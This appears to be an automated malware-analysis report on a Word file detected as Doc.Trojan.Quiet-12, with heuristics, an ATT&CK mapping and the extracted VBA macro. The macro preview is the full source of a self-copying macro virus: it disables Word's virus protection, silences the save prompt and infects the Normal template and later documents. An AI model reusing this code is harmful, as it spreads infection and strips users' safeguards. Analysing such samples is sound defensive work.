MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains VBA macros, specifically a Document_Open macro, which is designed to copy itself to the Normal.dot template. This action establishes persistence for the macro, allowing it to execute every time a new document is created. The ClamAV detection of 'Doc.Trojan.Quiet-12' further supports the malicious nature of this file.
Heuristics 3
-
ClamAV: Doc.Trojan.Quiet-12 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Quiet-12
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 946 bytes |
SHA-256: 2e0f56dca3c9a959264ea5f3260094f86e7229c02071e4d08e8f31958d9ac178 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
End Sub
Private Sub Document_open()
Application.Options.VirusProtection = False
Set Source = ActiveDocument.VBProject.VBComponents.Item(1)
Set dest = NormalTemplate.VBProject.VBComponents.Item(1)
If dest.codemodule.CountOfLines = 0 Then
For i = 1 To Source.codemodule.CountOfLines
dest.codemodule.insertlines i, Source.codemodule.lines(i, 1)
Next i
Application.Options.SaveNormalPrompt = False
End If
If Source.codemodule.CountOfLines = 0 Then
For i = 1 To dest.codemodule.CountOfLines
Source.codemodule.insertlines i, dest.codemodule.lines(i, 1)
Next i
ActiveDocument.SaveAs (ActiveDocument.FullName)
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.